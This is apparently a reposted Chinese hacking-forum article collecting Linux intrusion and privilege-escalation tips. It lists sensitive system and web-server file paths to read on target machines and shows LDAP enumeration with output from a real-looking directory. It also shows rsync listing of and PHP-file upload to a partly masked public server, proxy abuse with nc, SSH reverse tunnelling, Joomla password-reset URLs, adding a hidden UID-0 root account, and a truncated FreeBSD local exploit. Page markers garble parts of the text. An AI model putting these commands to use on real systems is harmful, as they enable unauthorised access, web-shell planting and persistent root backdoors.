Linux渗透与提权：技巧总结篇

发布时间：2013-12-24 18:05:30作者：知识屋

来源：t00ls

本文为Linux渗透与提权技巧总结篇，旨在收集各种Linux渗透技巧与提权版本，方便各位同学在日后的渗透测试中能够事半功倍。

Linux 系统下的一些常见路径：

			?

								/etc/passwd

								/etc/shadow

								/etc/fstab

								/etc/host.conf

								/etc/motd

								/etc/ld.so.conf

								/var/www/htdocs/index.php

								/var/www/conf/httpd.conf

								/var/www/htdocs/index.html

								/var/httpd/conf/php.ini

								/var/httpd/htdocs/index.php

								/var/httpd/conf/httpd.conf

								/var/httpd/htdocs/index.html

								/var/httpd/conf/php.ini

								/var/www/index.html

								/var/www/index.php

								/opt/www/conf/httpd.conf

								/opt/www/htdocs/index.php

								/opt/www/htdocs/index.html

								/usr/local/apache/htdocs/index.html

								/usr/local/apache/htdocs/index.php

								/usr/local/apache2/htdocs/index.html

								/usr/local/apache2/htdocs/index.php

								/usr/local/httpd2.2/htdocs/index.php

								/usr/local/httpd2.2/htdocs/index.html

								/tmp/apache/htdocs/index.html

								/tmp/apache/htdocs/index.php

								/etc/httpd/htdocs/index.php

								/etc/httpd/conf/httpd.conf

								/etc/httpd/htdocs/index.html

								/www/php/php.ini

								/www/php4/php.ini

								/www/php5/php.ini

								/www/conf/httpd.conf

								/www/htdocs/index.php

								/www/htdocs/index.html

								/usr/local/httpd/conf/httpd.conf

								/apache/apache/conf/httpd.conf

								/apache/apache2/conf/httpd.conf

								/etc/apache/apache.conf

								/etc/apache2/apache.conf

								/etc/apache/httpd.conf

								/etc/apache2/httpd.conf

								/etc/apache2/vhosts.d/00_default_vhost.conf

								/etc/apache2/sites-available/default

								/etc/phpmyadmin/config.inc.php

								/etc/mysql/my.cnf

								/etc/httpd/conf.d/php.conf

								/etc/httpd/conf.d/httpd.conf

								/etc/httpd/logs/error_log

								/etc/httpd/logs/error.log

								/etc/httpd/logs/access_log

								/etc/httpd/logs/access.log

								/home/apache/conf/httpd.conf

								/home/apache2/conf/httpd.conf

								/var/log/apache/error_log

								/var/log/apache/error.log

								/var/log/apache/access_log

								/var/log/apache/access.log

								/var/log/apache2/error_log

								/var/log/apache2/error.log

								/var/log/apache2/access_log

								/var/log/apache2/access.log

								/var/www/logs/error_log

								/var/www/logs/error.log

								/var/www/logs/access_log

								/var/www/logs/access.log

								/usr/local/apache/logs/error_log

								/usr/local/apache/logs/error.log

								/usr/local/apache/logs/access_log

								/usr/local/apache/logs/access.log

								/var/log/error_log

								/var/log/error.log

								/var/log/access_log

								/var/log/access.log

								/usr/local/apache/logs/access_logaccess_log.old

								/usr/local/apache/logs/error_logerror_log.old

								/etc/php.ini

								/bin/php.ini

								/etc/init.d/httpd

								/etc/init.d/mysql

								/etc/httpd/php.ini

								/usr/lib/php.ini

								/usr/lib/php/php.ini

								/usr/local/etc/php.ini

								/usr/local/lib/php.ini

								/usr/local/php/lib/php.ini

								/usr/local/php4/lib/php.ini

								/usr/local/php4/php.ini

								/usr/local/php4/lib/php.ini

								/usr/local/php5/lib/php.ini

								/usr/local/php5/etc/php.ini

								/usr/local/php5/php5.ini

								/usr/local/apache/conf/php.ini

								/usr/local/apache/conf/httpd.conf

								/usr/local/apache2/conf/httpd.conf

								/usr/local/apache2/conf/php.ini

								/etc/php4.4/fcgi/php.ini

								/etc/php4/apache/php.ini

								/etc/php4/apache2/php.ini

								/etc/php5/apache/php.ini

								/etc/php5/apache2/php.ini

								/etc/php/php.ini

								/etc/php/php4/php.ini

								/etc/php/apache/php.ini

								/etc/php/apache2/php.ini

								/web/conf/php.ini

								/usr/local/Zend/etc/php.ini

								/opt/xampp/etc/php.ini

								/var/local/www/conf/php.ini

								/var/local/www/conf/httpd.conf

								/etc/php/cgi/php.ini

								/etc/php4/cgi/php.ini

								/etc/php5/cgi/php.ini

								/php5/php.ini

								/php4/php.ini

								/php/php.ini

								/PHP/php.ini

								/apache/php/php.ini

								/xampp/apache/bin/php.ini

								/xampp/apache/conf/httpd.conf

								/NetServer/bin/stable/apache/php.ini

								/home2/bin/stable/apache/php.ini

								/home/bin/stable/apache/php.ini

								/var/log/mysql/mysql-bin.log

								/var/log/mysql.log

								/var/log/mysqlderror.log

								/var/log/mysql/mysql.log

								/var/log/mysql/mysql-slow.log

								/var/mysql.log

								/var/lib/mysql/my.cnf

								/usr/local/mysql/my.cnf

								/usr/local/mysql/bin/mysql

								/etc/mysql/my.cnf

								/etc/my.cnf

								/usr/local/cpanel/logs

								/usr/local/cpanel/logs/stats_log

								/usr/local/cpanel/logs/access_log

								/usr/local/cpanel/logs/error_log

								/usr/local/cpanel/logs/license_log

								/usr/local/cpanel/logs/login_log

								/usr/local/cpanel/logs/stats_log

								/usr/local/share/examples/php4/php.ini

								/usr/local/share/examples/php/php.ini

								/usr/local/tomcat5527/bin/version.sh

								/usr/share/tomcat6/bin/startup.sh

								/usr/tomcat6/bin/startup.sh

	[!--empirenews.page--]分页标题[/!--empirenews.page--]

liunx 相关提权渗透技巧总结，一、ldap 渗透技巧：

1.cat /etc/nsswitch

看看密码登录策略我们可以看到使用了file ldap模式
2.less /etc/ldap.conf

base ou=People,dc=unix-center,dc=net

找到ou,dc,dc设置

3.查找管理员信息

匿名方式

ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

有密码形式
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

4.查找10条用户记录
ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

实战:

1.cat /etc/nsswitch

看看密码登录策略我们可以看到使用了file ldap模式
2.less /etc/ldap.conf
base ou=People,dc=unix-center,dc=net

找到ou,dc,dc设置

3.查找管理员信息

匿名方式
ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

有密码形式
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

4.查找10条用户记录
ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

渗透实战:

1.返回所有的属性

			?

								ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"

								version: 1

								dn: dc=ruc,dc=edu,dc=cn

								dc: ruc

								objectClass: domain

								dn: uid=manager,dc=ruc,dc=edu,dc=cn

								uid: manager

								objectClass: inetOrgPerson

								objectClass: organizationalPerson

								objectClass: person

								objectClass: top

								sn: manager

								cn: manager

								dn: uid=superadmin,dc=ruc,dc=edu,dc=cn

								uid: superadmin

								objectClass: inetOrgPerson

								objectClass: organizationalPerson

								objectClass: person

								objectClass: top

								sn: superadmin

								cn: superadmin

								dn: uid=admin,dc=ruc,dc=edu,dc=cn

								uid: admin

								objectClass: inetOrgPerson

								objectClass: organizationalPerson

								objectClass: person

								objectClass: top

								sn: admin

								cn: admin

								dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn

								uid: dcp_anonymous

								objectClass: top

								objectClass: person

								objectClass: organizationalPerson

								objectClass: inetOrgPerson

								sn: dcp_anonymous

								cn: dcp_anonymous

2.查看基类
bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more version: 1 dn: dc=ruc,dc=edu,dc=cn dc: ruc objectClass: domain

3.查找

			?

								bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"

								version: 1

								dn:

								objectClass: top

								namingContexts: dc=ruc,dc=edu,dc=cn

								supportedExtension: 2.16.840.1.113730.3.5.7

								supportedExtension: 2.16.840.1.113730.3.5.8

								supportedExtension: 1.3.6.1.4.1.4203.1.11.1

								supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25

								supportedExtension: 2.16.840.1.113730.3.5.3

								supportedExtension: 2.16.840.1.113730.3.5.5

								supportedExtension: 2.16.840.1.113730.3.5.6

								supportedExtension: 2.16.840.1.113730.3.5.4

								supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1

								supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2

								supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3

								supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4

								supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5

								supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6

								supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7

								supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8

								supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9

								supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23

								supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11

								supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12

								supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13

								supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14

								supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15

								supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16

								supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17

								supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18

								supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19

								supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21

								supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22

								supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24

								supportedExtension: 1.3.6.1.4.1.1466.20037

								supportedExtension: 1.3.6.1.4.1.4203.1.11.3

								supportedControl: 2.16.840.1.113730.3.4.2

								supportedControl: 2.16.840.1.113730.3.4.3

								supportedControl: 2.16.840.1.113730.3.4.4

								supportedControl: 2.16.840.1.113730.3.4.5

								supportedControl: 1.2.840.113556.1.4.473

								supportedControl: 2.16.840.1.113730.3.4.9

								supportedControl: 2.16.840.1.113730.3.4.16

								supportedControl: 2.16.840.1.113730.3.4.15

								supportedControl: 2.16.840.1.113730.3.4.17

								supportedControl: 2.16.840.1.113730.3.4.19

								supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2

								supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6

								supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8

								supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1

								supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1

								supportedControl: 2.16.840.1.113730.3.4.14

								supportedControl: 1.3.6.1.4.1.1466.29539.12

								supportedControl: 2.16.840.1.113730.3.4.12

								supportedControl: 2.16.840.1.113730.3.4.18

								supportedControl: 2.16.840.1.113730.3.4.13

								supportedSASLMechanisms: EXTERNAL

								supportedSASLMechanisms: DIGEST-MD5

								supportedLDAPVersion: 2

								supportedLDAPVersion: 3

								vendorName: Sun Microsystems, Inc.

								vendorVersion: Sun-Java(tm)-System-Directory/6.2

								dataversion: 020090516011411

								netscapemdsuffix: cn=ldap://dc=webA:389

								supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA

								supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA

								supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA

								supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA

								supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA

								supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA

								supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA

								supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA

								supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA

								supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA

								supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA

								supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA

								supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA

								supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA

								supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA

								supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA

								supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA

								supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA

								supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5

								supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA

								supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA

								supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA

								supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA

								supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA

								supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA

								supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA

								supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA

								supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA

								supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA

								supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA

								supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA

								supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA

								supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA

								supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA

								supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA

								supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5

								supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5

								supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA

								supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA

								supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA

								supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA

								supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA

								supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5

								supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5

								supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5

								supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5

								supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5

								supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5

								supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5

	[!--empirenews.page--]分页标题[/!--empirenews.page--]

liunx 相关提权渗透技巧总结，二、NFS 渗透技巧：

列举IP：

showmount -e ip

liunx 相关提权渗透技巧总结，三、rsync渗透技巧：

1.查看rsync服务器上的列表：

			?

								rsync 210.51.X.X::

								finance

								img_finance

								auto

								img_auto

								html_cms

								img_cms

								ent_cms

								ent_img

								ceshi

								res_img

								res_img_c2

								chip

								chip_c2

								ent_icms

								games

								gamesimg

								media

								mediaimg

								fashion

								res-fashion

								res-fo

								taobao-home

								res-taobao-home

								house

								res-house

								res-home

								res-edu

								res-ent

								res-labs

								res-news

								res-phtv

								res-media

								home

								edu

								news

								res-book

看相应的下级目录(注意一定要在目录后面添加上/)

			?

								rsync 210.51.X.X::htdocs_app/

								rsync 210.51.X.X::auto/

								rsync 210.51.X.X::edu/

2.下载rsync服务器上的配置文件
rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

3.向上更新rsync文件(成功上传,不会覆盖)

rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/

http://app.finance.xxx.com/warn/nothack.txt

liunx 相关提权渗透技巧总结，四、squid渗透技巧：

nc -vv 91ri.org 80
GET HTTP://www.sina.com / HTTP/1.0
GET HTTP://WWW.sina.com:22 / HTTP/1.0

liunx 相关提权渗透技巧总结，五、SSH端口转发：

ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

liunx 相关提权渗透技巧总结，六、joomla渗透小技巧：

确定版本：

index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47

重新设置密码：
index.php?option=com_user&view=reset&layout=confirm

liunx 相关提权渗透技巧总结，七、Linux添加UID为0的root用户：
useradd -o -u 0 nothack

liunx 相关提权渗透技巧总结，八、freebsd本地提权：

			?

								[argp@julius ~]$ uname -rsi

								* freebsd 7.3-RELEASE GENERIC

								* [argp@julius ~]$ sysctl vfs.usermount

								* vfs.usermount: 1

								* [argp@julius ~]$ id

								* uid=1001(argp) gid=1001(argp) groups=1001(argp)

								* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex

								* [argp@julius ~]$ ./nfs_mount_ex

								*

								calling nmount()

tar 文件夹打包：

1、tar打包：

tar -cvf /home/public_html/*.tar /home/public_html/--exclude=排除文件*.gif 排除目录 /xx/xx/*

alzip打包(韩国) alzip -a D:WEB d:web*.rar

{

注：

关于tar的打包方式,linux不以扩展名来决定文件类型。

若压缩的话tar -ztf *.tar.gz 查看压缩包里内容 tar -zxf *.tar.gz 解压

那么用这条比较好

tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif 排除目录 /xx/xx/*

}